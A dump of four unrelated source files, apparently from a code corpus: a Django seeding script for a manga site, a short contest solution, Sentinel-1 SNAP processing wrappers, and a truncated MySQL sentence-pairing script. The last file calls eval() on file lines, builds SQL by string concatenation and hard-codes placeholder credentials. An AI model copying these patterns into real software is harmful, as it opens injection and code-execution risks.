for tag_type in [TagType.AUTHOR, TagType.CIRCLE, TagType.EVENT, TagType.MAGAZINE, TagType.PARODY, TagType.SCANLATOR]:
if random.random() < 0.5: tag_list.append(random.choice(tag_dict[tag_type]))
tag_list.extend(random.sample(tag_dict[TagType.CONTENT], random.randint(1, min(10, tag_content_count))))
manga_tag_list.extend(map(lambda tag: MangaTag(manga=manga, tag=tag), tag_list))
MangaTag.objects.bulk_create(manga_tag_list)
for i in range(0, Manga.objects.count(), CHUNK_SIZE):
_create_manga_tags(Manga.objects.all()[i:i+CHUNK_SIZE])
@timed
def create_manga_pages(self):
manga_page_list = []
for manga in Manga.objects.all():
manga_page_list.append(MangaPage(
manga=manga,
page=1,
name='001.jpg',
))
MangaPage.objects.bulk_create(manga_page_list)
@timed
def create_comments(self):
user_list = User.objects.all()
comment_list = []
for manga in Manga.published.all():
for i in range(random.choice(self.config['COMMENTS'])):
comment = lorem_ipsum.words(random.randint(1, 15), common=False)
comment_list.append(Comment(
content_type=ContentType.objects.get_for_model(manga),
object_id=manga.id,
markdown=comment,
html='<p>{}</p>'.format(comment),
created_by=random.choice(user_list),
))
Comment.objects.bulk_create(comment_list)
@timed
def create_manga_reports(self):
user_id_list = User.objects.all().values_list('id', flat=True)
manga_id_list = Manga.objects.all().values_list('id', flat=True)[:self.config['REPORTS']]
type_list = list(ReportMangaType.choices_dict.keys())
report_manga_list = []
for i in range(self.config['REPORTS']):
report_manga_list.append(ReportManga(
manga_id=random.choice(manga_id_list),
status=ReportStatus.OPEN,
type=random.choice(type_list),
comment=lorem_ipsum.sentence(),
weight=random.randint(1, 25),
created_by_id=random.choice(user_id_list),
))
ReportManga.all.bulk_create(report_manga_list)
@timed
def create_blog_entries(self):
blog_entry_list = []
for i in range(self.config['BLOG']):
title = lorem_ipsum.sentence()
markdown = '\n\n'.join(lorem_ipsum.paragraphs(random.randint(1, 3)))
blog_entry = BlogEntry(
title=title,
slug=slugify(title),
markdown=markdown,
html=convert_markdown(markdown),
created_by=self.user,
)
blog_entry_list.append(blog_entry)
BlogEntry.objects.bulk_create(blog_entry_list)
@timed
def create_settings(self):
settings = (
(SiteSettingKey.ENABLE_COMMENTS, 'True'),
(SiteSettingKey.ENABLE_DOWNLOADS, 'True'),
(SiteSettingKey.ENABLE_REGISTRATION, 'True'),
(SiteSettingKey.ENABLE_UPLOADS, 'True'),
)
for k, v in settings: SiteSetting.set_val(k, v, self.user)
def run(self):
print('-'*80)
print('datacreator.py started')
start = datetime.datetime.now()
self.create_users()
self.create_tags()
self.create_tag_aliases()
self.create_tag_data()
self.create_manga()
self.assign_manga_tank()
self.assign_manga_collection()
self.create_manga_tags()
self.create_manga_pages()
self.create_comments()
self.create_manga_reports()
self.create_blog_entries()
self.create_settings()
finish = datetime.datetime.now()
print('datacreator.py finished in {}'.format(finish-start))
print('-'*80)
#-------------------------------------------------------------------------------
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Datacreator utility for Fufufuu')
parser.add_argument('--config', dest='config', default='default', help='specify the configuration for datacreator to use (optional)')
arg_dict = vars(parser.parse_args())
dc = DataCreator(arg_dict['config'])
dc.run()
|
15,159 | a955a0b2de55d04673dcfeedaff98c535ff3a2c9 | _, prize_num = map(int, input().split())
scores = list(map(int, input().split()))
print(sorted(scores, reverse=True)[prize_num-1]) |
15,160 | a3219bce4c41288077776d06609aa9e1ead36aeb | # -*- coding: utf-8 -*-
import os
from os.path import join as opj
import logging
import sys
import rasterio
import warnings
from rasterio.errors import NotGeoreferencedWarning
from ost.helpers import utils as h
from ost.settings import SNAP_S1_RESAMPLING_METHODS, OST_ROOT
logger = logging.getLogger(__name__)
def _import(infile, out_prefix, logfile, swath, burst, polar='VV,VH,HH,HV'):
'''A wrapper of SNAP import of a single Sentinel-1 SLC burst
This function takes an original Sentinel-1 scene (either zip or
SAFE format), updates the orbit information (does not fail if not
available), and extracts a single burst based on the
given input parameters.
Args:
infile: string or os.path object for
an original Sentinel-1 GRD product in zip or SAFE format
out_prefix: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
swath (str): the corresponding IW subswath of the burst
burst (str): the burst number as in the Sentinel-1 annotation file
polar (str): a string consisiting of the polarisation (comma separated)
e.g. 'VV,VH',
default value: 'VV,VH,HH,HV'
'''
# get gpt file
gpt_file = h.gpt_path()
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_BurstSplit_AO.xml')
logger.debug('INFO: Importing Burst {} from Swath {} '
'from scene {}'.format(burst, swath, os.path.basename(infile))
)
command = '{} {} -x -q {} -Pinput={} -Ppolar={} -Pswath={}\
-Pburst={} -Poutput={}'\
.format(gpt_file, graph, 2, infile, polar, swath,
burst, out_prefix)
return_code = h.run_command(command, logfile)
if return_code == 0:
logger.debug('INFO: Succesfully imported product')
else:
logger.debug('ERROR: Frame import exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(119)
return return_code
def _ha_alpha(infile, outfile, logfile, pol_speckle_filter=False):
'''A wrapper of SNAP H-A-alpha polarimetric decomposition
This function takes an OST imported Sentinel-1 scene/burst
and calulates the polarimetric decomposition parameters for
the H-A-alpha decomposition.
Args:
infile: string or os.path object for
an original Sentinel-1 GRD product in zip or SAFE format
out_prefix: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
pol_speckle_filter (bool): wether or not to apply the
polarimetric speckle filter
'''
# get gpt file
gpt_file = h.gpt_path()
if pol_speckle_filter:
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
'S1_SLC_Deb_Spk_Halpha.xml'
)
else:
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
'S1_SLC_Deb_Halpha.xml'
)
logger.debug("INFO: Calculating the H-alpha dual polarisation")
command = '{} {} -x -q {} -Pinput={} -Poutput={}'\
.format(gpt_file, graph, 2, infile, outfile)
return_code = h.run_command(command, logfile)
if return_code == 0:
logger.debug('INFO: Succesfully created H/Alpha product')
else:
logger.debug('ERROR: H/Alpha exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(121)
return return_code
def _calibration(infile,
outfile,
logfile,
product_type='GTCgamma',
dem='SRTM 1sec HGT',
resampling=SNAP_S1_RESAMPLING_METHODS[2],
dem_file='',
dem_nodata=0.0,
region=''
):
'''A wrapper around SNAP's radiometric calibration
This function takes OST imported Sentinel-1 product and generates
it to calibrated backscatter.
3 different calibration modes are supported.
- Radiometrically terrain corrected Gamma nought (RTC)
NOTE: that the routine actually calibrates to bet0 and needs to
be used together with _terrain_flattening routine
- ellipsoid based Gamma nought (GTCgamma)
- Sigma nought (GTCsigma).
Args:
infile: string or os.path object for
an OST imported frame in BEAM-Dimap format (i.e. *.dim)
outfile: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
resolution (int): the resolution of the output product in meters
product_type (str): the product type of the output product
i.e. RTC, GTCgamma or GTCsigma
'''
# get gpt file
gpt_file = h.gpt_path()
if product_type == 'RTC':
logger.debug('INFO: Calibrating the product to a RTC product.')
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
'S1_SLC_TNR_Calbeta_Deb_ML_TF_SUB.xml')
command = '{} {} -x -q {} -Pdem=\'{}\' -Pdem_file="{}" ' \
'-Pdem_nodata={} -Presampling={} -Pregion="{}" -Pinput={} ' \
'-Poutput={}' \
.format(gpt_file, graph, 2, dem, dem_file,
dem_nodata, resampling, region, infile, outfile)
elif product_type == 'GTCgamma':
logger.debug(
'INFO: Calibrating the product to a GTC product (Gamma0).'
)
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
'S1_SLC_TNR_CalGamma_Deb_SUB.xml')
command = '{} {} -x -q {} -Pregion="{}" -Pinput={} -Poutput={}' \
.format(gpt_file, graph, 2, region, infile, outfile)
elif product_type == 'GTCsigma':
logger.debug(
'INFO: Calibrating the product to a GTC product (Sigma0).'
)
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD',
'S1_SLC_TNR_CalSigma_Deb_SUB.xml')
command = '{} {} -x -q {} -Pregion="{}" -Pinput={} -Poutput={}' \
.format(gpt_file, graph, 2, region, infile, outfile)
else:
logger.debug('ERROR: Wrong product type selected.')
sys.exit(121)
logger.debug("INFO: Removing thermal noise, calibrating and debursting")
return_code = h.run_command(command, logfile)
if return_code == 0:
logger.debug('INFO: Succesfully calibrated product')
else:
logger.debug('ERROR: Frame import exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(121)
return return_code
def _speckle_filter(infile, outfile, logfile):
'''A wrapper around SNAP's Refined Lee Speckle Filter
This function takes OST imported Sentinel-1 product and applies
a standardised version of the Lee-Sigma Speckle Filter with
SNAP's defaut values.
Args:
infile: string or os.path object for
an OST imported frame in BEAM-Dimap format (i.e. *.dim)
outfile: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
'''
# get path to SNAP's command line executable gpt
gpt_file = h.gpt_path()
logger.debug('INFO: Applying the Refined-Lee Speckle Filter')
# contrcut command string
command = '{} Speckle-Filter -x -q {} -PestimateENL=true ' \
'-Pfilter=\'Refined Lee\' -t \'{}\' ' \
'\'{}\''.format(gpt_file, 2, outfile, infile)
# run command and get return code
return_code = h.run_command(command, logfile)
# hadle errors and logs
if return_code == 0:
logger.debug('INFO: Succesfully imported product')
else:
logger.debug('ERROR: Speckle Filtering exited with an error. \
See {} for Snap Error output'.format(logfile))
sys.exit(111)
return return_code
def _linear_to_db(infile, outfile, logfile):
'''A wrapper around SNAP's linear to db routine
This function takes an OST calibrated Sentinel-1 product
and converts it to dB.
Args:
infile: string or os.path object for
an OST imported frame in BEAM-Dimap format (i.e. *.dim)
outfile: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
'''
# get path to SNAP's command line executable gpt
gpt_file = h.gpt_path()
logger.debug('INFO: Converting the image to dB-scale.')
# construct command string
command = '{} LinearToFromdB -x -q {} -t \'{}\' {}'.format(
gpt_file, 2, outfile, infile)
# run command and get return code
return_code = h.run_command(command, logfile)
# handle errors and logs
if return_code == 0:
logger.debug('INFO: Succesfully converted product to dB-scale.')
else:
logger.debug('ERROR: Linear to dB conversion exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(113)
return return_code
def _ls_mask(infile, outfile, logfile, resolution, dem='SRTM 1sec HGT'):
'''A wrapper around SNAP's Layover/Shadow mask routine
This function takes OST imported Sentinel-1 product and calculates
the Layover/Shadow mask.
Args:
infile: string or os.path object for
an OST imported frame in BEAM-Dimap format (i.e. *.dim)
outfile: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
resolution (int): the resolution of the output product in meters
dem (str): A Snap compliant string for the dem to use.
Possible choices are:
'SRTM 1sec HGT'(default)
'SRTM 3sec'
'ASTER 1sec GDEM'
'ACE30'
'''
# get gpt file
gpt_file = h.gpt_path()
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_LS_TC.xml')
logger.debug("INFO: Compute Layover/Shadow mask")
command = '{} {} -x -q {} -Pinput={} -Presol={} -Poutput={} -Pdem=\'{}\''\
.format(gpt_file, graph, 2, infile, resolution,
outfile, dem)
return_code = h.run_command(command, logfile)
if return_code == 0:
logger.debug('INFO: Succesfully created Layover/Shadow mask')
else:
logger.debug('ERROR: Layover/Shadow mask creation exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(121)
return return_code
def _coreg(filelist, outfile, logfile, dem='SRTM 1sec HGT'):
'''A wrapper around SNAP's back-geocoding co-registration routine
This function takes a list of 2 OST imported Sentinel-1 SLC products
and co-registers them properly. This routine is sufficient for coherence
estimation, but not for InSAR, since the ESD refinement is not applied.
Args:
infile: string or os.path object for
an OST imported frame in BEAM-Dimap format (i.e. *.dim)
outfile: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
dem (str): A Snap compliant string for the dem to use.
Possible choices are:
'SRTM 1sec HGT'(default)
'SRTM 3sec'
'ASTER 1sec GDEM'
'ACE30'
'''
# get gpt file
gpt_file = h.gpt_path()
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_BGD.xml')
logger.debug('INFO: Co-registering {}'.format(filelist[0]))
command = '{} {} -x -q {} -Pfilelist={} -Poutput={} -Pdem=\'{}\''\
.format(gpt_file, graph, 2, filelist, outfile, dem)
return_code = h.run_command(command, logfile)
if return_code == 0:
logger.debug('INFO: Succesfully coregistered product.')
else:
logger.debug('ERROR: Co-registration exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(112)
return return_code
def _coreg2(master,
slave,
outfile,
logfile, dem='SRTM 1sec HGT',
master_burst_poly=''
):
'''A wrapper around SNAP's back-geocoding co-registration routine
This function takes a list of 2 OST imported Sentinel-1 SLC products
and co-registers them properly. This routine is sufficient for coherence
estimation, but not for InSAR, since the ESD refinement is not applied.
Args:
infile: string or os.path object for
an OST imported frame in BEAM-Dimap format (i.e. *.dim)
outfile: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
dem (str): A Snap compliant string for the dem to use.
Possible choices are:
'SRTM 1sec HGT'(default)
'SRTM 3sec'
'ASTER 1sec GDEM'
'ACE30'
'''
# get gpt file
gpt_file = h.gpt_path()
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_Coreg.xml')
logger.debug('INFO: Co-registering {} and {}'.format(master, slave))
command = '{} {} -x -q {} -Pmaster={} -Pslave={} -Poutput={} ' \
'-Pdem=\'{}\' -Pregion="{}"' \
.format(gpt_file, graph, 2, master, slave,
outfile, dem, master_burst_poly
)
return_code = h.run_command(command, logfile)
if return_code == 0:
logger.debug('INFO: Succesfully coregistered product.')
else:
logger.debug('ERROR: Co-registration exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(112)
return return_code
def _coherence(infile, outfile, logfile):
'''A wrapper around SNAP's coherence routine
This function takes a co-registered stack of 2 Sentinel-1 SLC products
and calculates the coherence.
Args:
infile: string or os.path object for
an OST imported frame in BEAM-Dimap format (i.e. *.dim)
outfile: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
'''
# get gpt file
gpt_file = h.gpt_path()
graph = opj(OST_ROOT, 'graphs', 'S1_SLC2ARD', 'S1_SLC_Coh_Deb.xml')
logger.debug('INFO: Coherence estimation')
command = '{} {} -x -q {} -Pinput={} -Poutput={}' \
.format(gpt_file, graph, 2, infile, outfile)
return_code = h.run_command(command, logfile)
if return_code == 0:
logger.debug('INFO: Succesfully created coherence product.')
else:
logger.debug('ERROR: Coherence exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(121)
return return_code
def _terrain_correction(infile, outfile, logfile, resolution,
dem='SRTM 1sec HGT'):
'''A wrapper around SNAP's Terrain Correction routine
This function takes an OST calibrated Sentinel-1 product and
does the geocodification.
Args:
infile: string or os.path object for
an OST imported frame in BEAM-Dimap format (i.e. *.dim)
outfile: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
resolution (int): the resolution of the output product in meters
dem (str): A Snap compliant string for the dem to use.
Possible choices are:
'SRTM 1sec HGT'(default)
'SRTM 3sec'
'ASTER 1sec GDEM'
'ACE30'
'''
# get gpt file
gpt_file = h.gpt_path()
logger.debug("INFO: Geocoding input scene")
command = '{} Terrain-Correction -x -q {} \
-PdemResamplingMethod=\'BILINEAR_INTERPOLATION\'\
-PimgResamplingMethod=\'BILINEAR_INTERPOLATION\'\
-PnodataValueAtSea=\'false\'\
-PpixelSpacingInMeter=\'{}\'\
-PdemName=\'{}\'\
-t {} {}'\
.format(gpt_file, 2, resolution, dem,
outfile, infile)
return_code = h.run_command(command, logfile)
if return_code == 0:
logger.debug('INFO: Succesfully orthorectified product.')
else:
logger.debug('ERROR: Geocoding exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(122)
return return_code
def _terrain_correction_deg(infile, outfile, logfile, resolution=0.001,
dem='SRTM 1sec HGT'):
'''A wrapper around SNAP's Terrain Correction routine
This function takes an OST calibrated Sentinel-1 product and
does the geocodification.
Args:
infile: string or os.path object for
an OST imported frame in BEAM-Dimap format (i.e. *.dim)
outfile: string or os.path object for the output
file written in BEAM-Dimap format
logfile: string or os.path object for the file
where SNAP'S STDOUT/STDERR is written to
resolution (int): the resolution of the output product in degree
dem (str): A Snap compliant string for the dem to use.
Possible choices are:
'SRTM 1sec HGT'(default)
'SRTM 3sec'
'ASTER 1sec GDEM'
'ACE30'
'''
# get gpt file
gpt_file = h.gpt_path()
logger.debug("INFO: Geocoding input scene")
command = '{} Terrain-Correction -x -q {} \
-PdemResamplingMethod=\'BILINEAR_INTERPOLATION\'\
-PimgResamplingMethod=\'BILINEAR_INTERPOLATION\'\
-PnodataValueAtSea=\'false\'\
-PpixelSpacingInDegree=\'{}\'\
-PdemName=\'{}\'\
-t {} {}'\
.format(gpt_file, 2, resolution, dem,
outfile, infile)
return_code = h.run_command(command, logfile)
if return_code == 0:
logger.debug('INFO: Succesfully orthorectified product.')
else:
logger.debug('ERROR: Geocoding exited with an error. \
See {} for Snap Error output'.format(logfile))
# sys.exit(122)
return return_code
def burst_to_ard(
master_file,
swath,
master_burst_nr,
master_burst_id,
master_burst_poly,
out_dir,
out_prefix,
temp_dir,
polarimetry=False,
pol_speckle_filter=False,
resolution=20,
product_type='GTCgamma',
speckle_filter=False,
to_db=False,
ls_mask_create=False,
dem='SRTM 1sec HGT'
):
'''The main routine to turn a burst into an ARD product
Args:
master_file (str): path to full master SLC scene
swath (str): subswath
master_burst_nr (): index number of the burst
master_burst_id ():
master_burst_poly (): burst WKT used for faster calibration
out_dir (str):
temp_dir (str):
slave_file (str):
slave_burst_nr (str):
slave_burst_id (str):
coherence (bool):
polarimetry (bool):
pol_speckle_filter (bool):
resolution (int):
product_type (str):
speckle_filter (bool):
to_db (bool):
ls_mask (bool):
dem (str):
remove_slave_import (bool):
'''
if len(master_file) != 1 and isinstance(master_file, list) \
or master_file == '' or master_file is None:
raise RuntimeError('No or invalid file in swath %s burst %s, input: %s',
swath, master_burst_id, master_file
)
if isinstance(master_file, list):
master_file = master_file[0]
# Check for empty spaces in prefix
out_prefix = out_prefix.replace(' ', '_')
# import master
master_import = opj(temp_dir, '{}_import'.format(master_burst_id))
out_ard_path = opj(out_dir, '{}_{}_BS'.format(out_prefix, master_burst_id))
if os.path.isfile(out_ard_path+'.dim'):
return_code = 0
logger.debug('File for burst %s and its swath exists, skipping!',
master_burst_id
)
return return_code
if not os.path.exists('{}.dim'.format(master_import)):
import_log = opj(out_dir, '{}_import.err_log'.format(master_burst_id))
return_code = _import(master_file, master_import, import_log,
swath, master_burst_nr)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
if polarimetry:
# create HAalpha file
out_haa = opj(temp_dir, '{}_h'.format(master_burst_id))
haa_log = opj(out_dir, '{}_haa.err_log'.format(
master_burst_id))
return_code = _ha_alpha('{}.dim'.format(master_import),
out_haa, haa_log, pol_speckle_filter)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# geo code HAalpha
out_htc = opj(temp_dir, '{}_ha_alpha'.format(master_burst_id))
haa_tc_log = opj(out_dir, '{}_haa_tc.err_log'.format(
master_burst_id))
_terrain_correction(
'{}.dim'.format(out_haa), out_htc, haa_tc_log, resolution, dem)
# last check on the output files
return_code = h.check_out_dimap(out_htc)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# move to final destination
h.move_dimap(
out_htc, opj(out_dir, '{}_ha_alpha'.format(master_burst_id)))
# remove HAalpha tmp files
h.delete_dimap(out_haa)
# Calibrate
out_cal = opj(temp_dir, '{}_cal'.format(master_burst_id))
cal_log = opj(out_dir, '{}_cal.err_log'.format(master_burst_id))
return_code = _calibration(
'{}.dim'.format(master_import),
out_cal,
cal_log,
product_type,
region=master_burst_poly
)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# remove imports
h.delete_dimap(master_import)
# speckle filtering
if speckle_filter:
speckle_import = opj(temp_dir, '{}_speckle_import'.format(
master_burst_id))
speckle_log = opj(out_dir, '{}_speckle.err_log'.format(
master_burst_id))
return_code = _speckle_filter('{}.dim'.format(out_cal),
speckle_import, speckle_log)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# remove temp file
h.delete_dimap(out_cal)
# reset master_import for next routine
out_cal = speckle_import
if to_db:
out_db = opj(temp_dir, '{}_cal_db'.format(master_burst_id))
db_log = opj(out_dir, '{}_cal_db.err_log'.format(master_burst_id))
return_code = _linear_to_db('{}.dim'.format(out_cal), out_db, db_log)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# remove tmp files
h.delete_dimap(out_cal)
# set out_cal to out_db for further processing
out_cal = out_db
# geo code backscatter products
out_tc = opj(temp_dir, '{}_{}_BS'.format(out_prefix, master_burst_id))
tc_log = opj(out_dir, '{}_BS_tc.err_log'.format(master_burst_id))
_terrain_correction(
'{}.dim'.format(out_cal), out_tc, tc_log, resolution, dem)
# last check on backscatter data
return_code = h.check_out_dimap(out_tc)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# we move backscatter to final destination
h.move_dimap(
out_tc, opj(out_dir, '{}_{}_BS'.format(out_prefix, master_burst_id))
)
if ls_mask_create:
# create LS map
out_ls = opj(temp_dir, '{}_{}_LS'.format(out_prefix, master_burst_id))
ls_log = opj(out_dir, '{}_LS.err_log'.format(master_burst_id))
return_code = _ls_mask('{}.dim'.format(out_cal), out_ls, ls_log,
resolution, dem)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# last check on ls data
return_code = h.check_out_dimap(out_ls, test_stats=False)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# move ls data to final destination
h.move_dimap(out_ls, opj(
out_dir,
'{}_{}_LS'.format(out_prefix, master_burst_id))
)
# remove calibrated files
h.delete_dimap(out_cal)
# write file, so we know this burst has been succesfully processed
if return_code == 0:
check_file = opj(out_dir, '.processed')
with open(str(check_file), 'w') as file:
file.write('passed all tests \n')
else:
try:
h.remove_folder_content(temp_dir)
h.remove_folder_content(out_dir)
except Exception as e:
logger.debug(e)
return return_code
def _2products_coherence_tc(
master_scene,
master_file,
master_burst_poly,
slave_scene,
slave_file,
out_dir,
temp_dir,
swath,
master_burst_id,
master_burst_nr,
slave_burst_id,
slave_burst_nr,
resolution=20,
dem='SRTM 1Sec HGT',
dem_file='',
resampling='BILINEAR_INTERPOLATION',
polar='VV,VH,HH,HV'
):
warnings.filterwarnings("ignore", category=NotGeoreferencedWarning)
return_code = None
# import master
master_import = opj(temp_dir, '{}_import'.format(master_burst_id))
if not os.path.exists('{}.dim'.format(master_import)):
import_log = opj(out_dir, '{}_import.err_log'.format(master_burst_id))
return_code = _import(
infile=master_file,
out_prefix=master_import,
logfile=import_log,
swath=swath,
burst=master_burst_nr,
polar=polar
)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# check if master has data or not
data_path = opj(temp_dir, '{}_import.data'.format(master_burst_id))
if not os.path.exists(data_path):
return 333
for f in os.listdir(data_path):
if f.endswith('.img') and 'q' in f:
f = opj(data_path, f)
with rasterio.open(f, 'r') as in_img:
if not in_img.read(1).any():
return_code = 333
else:
return_code = 0
if return_code != 0:
# remove imports
h.delete_dimap(master_import)
return return_code
# import slave
slave_import = opj(temp_dir, '{}_slave_import'.format(slave_burst_id))
import_log = opj(out_dir, '{}_slave_import.err_log'.format(slave_burst_id))
return_code = _import(
infile=slave_file,
out_prefix=slave_import,
logfile=import_log,
swath=swath,
burst=slave_burst_nr,
polar=polar
)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# check if slave has data or not
data_path = opj(temp_dir, '{}_slave_import.data'.format(master_burst_id))
if not os.path.exists(data_path):
return 333
for f in os.listdir(data_path):
if f.endswith('.img') and 'q' in f:
f = opj(data_path, f)
with rasterio.open(f, 'r') as in_img:
if not in_img.read(1).any():
return_code = 333
else:
return_code = 0
if return_code != 0:
# remove imports
h.delete_dimap(slave_import)
return return_code
# co-registration
out_coreg = opj(temp_dir, '{}_coreg'.format(master_burst_id))
coreg_log = opj(out_dir, '{}_coreg.err_log'.format(master_burst_id))
logger.debug('{}.dim'.format(master_import))
logger.debug('{}.dim'.format(slave_import))
return_code = _coreg2('{}.dim'.format(master_import),
'{}.dim'.format(slave_import),
out_coreg,
coreg_log,
dem,
master_burst_poly
)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# remove imports
h.delete_dimap(master_import)
h.delete_dimap(slave_import)
# calculate coherence and deburst
out_coh = opj(temp_dir, '{}_c'.format(master_burst_id))
coh_log = opj(out_dir, '{}_coh.err_log'.format(master_burst_id))
return_code = _coherence('{}.dim'.format(out_coreg),
out_coh, coh_log
)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# remove coreg tmp files
h.delete_dimap(out_coreg)
# geocode
out_tc = opj(temp_dir, '{}_{}_{}_coh'.format(master_scene.start_date,
slave_scene.start_date,
master_burst_id
)
)
tc_log = opj(out_dir, '{}_coh_tc.err_log'.format(master_burst_id)
)
_terrain_correction(
'{}.dim'.format(out_coh),
out_tc,
tc_log,
resolution,
dem
)
# last check on coherence data
return_code = h.check_out_dimap(out_tc)
if return_code != 0:
h.remove_folder_content(temp_dir)
return return_code
# move to final destination
h.move_dimap(out_tc, opj(out_dir, '{}_{}_{}_coh'.format(master_scene.start_date,
slave_scene.start_date,
master_burst_id)
)
)
# remove tmp files
h.delete_dimap(out_coh)
# write file, so we know this burst has been succesfully processed
if return_code == 0:
check_file = opj(out_dir, '.processed')
with open(str(check_file), 'w') as file:
file.write('passed all tests \n')
else:
h.remove_folder_content(temp_dir)
h.remove_folder_content(out_dir)
return return_code
|
15,161 | 885b2532998ee2091f0e3a410eebd4cffa24df89 |
import MySQLdb
import MySQLdb.cursors
import sys
from time import *
# DB connection information
# DB host
host = 'localhost'
# DB user
user = 'dbuser'
# DB password
passwd = 'password'
# Name of used DB
dbName = 'deu_mixed_2011'
# config
# every word id less or equal this value will be ignored
wordIdBoundary = 87839
# size of length of every word vector
countOfWords = 5
# number of sentences to process, -1 indicates to process all sentences in export file
countOfSentences = -1
# create db connection
db = MySQLdb.connect(host = host,
user = user,
passwd = passwd,
db = dbName,
cursorclass = MySQLdb.cursors.SSCursor)
def createWordVectors(inputFile, countOfSentences):
print("Creating word vector")
import bisect
import fileinput
with open("wordvectors", "w") as file:
# init vector
vector = {"key": -1, "items": []}
for inputLine in inputFile:
if countOfSentences == 0:
break
sId, wId = eval(inputLine.replace("\n", ""))
# ignore top words
if wId <= wordIdBoundary:
continue
if vector["key"] == -1: #first wordvector
vector["key"] = sId
vector["items"] = [wId]
elif sId == vector["key"]:
# insert new wId in ascending order
bisect.insort(vector["items"], wId)
# delete the first item if length of list is greater than countOfWord
if len(vector["items"]) > countOfWords:
del vector["items"][0]
else:
if len(vector["items"]) == countOfWords:
file.write(str(vector) + "\n")
vector["key"] = sId
vector["items"] = [wId]
countOfSentences -= 1
def createSentenceVectors():
print("Creating sentence vector")
import fileinput
with open("wordvectors", "r+") as file:
open("sentencevectors", "w").close()
for line in file:
wordVector = eval(line.replace("\n", ""))
# change sentencevector file in place
sentenceVectorFile = fileinput.input(files=("sentencevectors"), inplace=True)
for svLine in sentenceVectorFile:
sentenceVector = eval(svLine.replace("\n", ""))
# if sentenceVector["key"] is in wordVector["items"]
# append new sId to sentenceVector and remove old wId from wordVector
if sentenceVector["key"] in wordVector["items"]:
sentenceVector["items"].append(wordVector["key"])
wordVector["items"].remove(sentenceVector["key"])
# write back to file
print str(sentenceVector) + "\n",
sentenceVectorFile.close()
# if every item in wordVector["items"] was found in sentenceVectorFile
# creating new sentenceVectors is not necessary
if len(wordVector["items"]) > 0:
with open("sentencevectors", "a") as svFile:
for wId in wordVector["items"]:
svFile.write(str({"key": wId, "items": [wordVector["key"]]}) + "\n")
os.remove("wordvectors")
def createSentencePairs():
print("Create sentence pairs")
with open("pairs", "w") as pairsFile, open("sentencevectors", "r") as svFile:
for line in svFile:
sentences = eval(line.replace("\n", ""))["items"]
# copy current sentence vector
dummySet = list(sentences)
# pair every sId with every other sId in this sentenceVector
while(1 < len(dummySet)):
sentence1 = dummySet.pop()
for sentence2 in dummySet:
# save new found pair in ascending order
if sentence1 < sentence2:
pairsFile.write(str(sentence1) + " " + str(sentence2) + "\n")
else:
pairsFile.write(str(sentence2) + " " + str(sentence1) + "\n")
os.remove("sentencevectors")
def getSentences(dbConn, fileName):
with open(fileName, "w") as newFile, open("sorted-counted-pairs", "r+") as pairsFile:
for line in pairsFile:
sid1, sid2 = line.strip().split(" ")[1:]
query1 = "select sentence from sentences where s_id = " + str(sid1)
query2 = "select sentence from sentences where s_id = " + str(sid2)
cursor = dbConn.cursor()
cursor.execute(query1)
s1 = cursor.fetchone()
cursor.close()
cursor = dbConn.cursor()
cursor.execute(query2)
s2 = cursor.fetchone()
cursor.close()
newFile.write(str(sid1) + ":\t" + str(s1) + "\n")
newFile.write(str(sid2) + ":\t" + str(s2) + "\n")
newFile.write("------------------\n")
if __name__ == "__main__":
import os.path
fileName = dbName
# if file not exists get inverse list from database and sort file
if not os.path.isfile(fileName):
print("Exporting s_id, w_id from inv_w...")
query = "SELECT s_id, w_id FROM inv_w"
c1 = db.cursor()
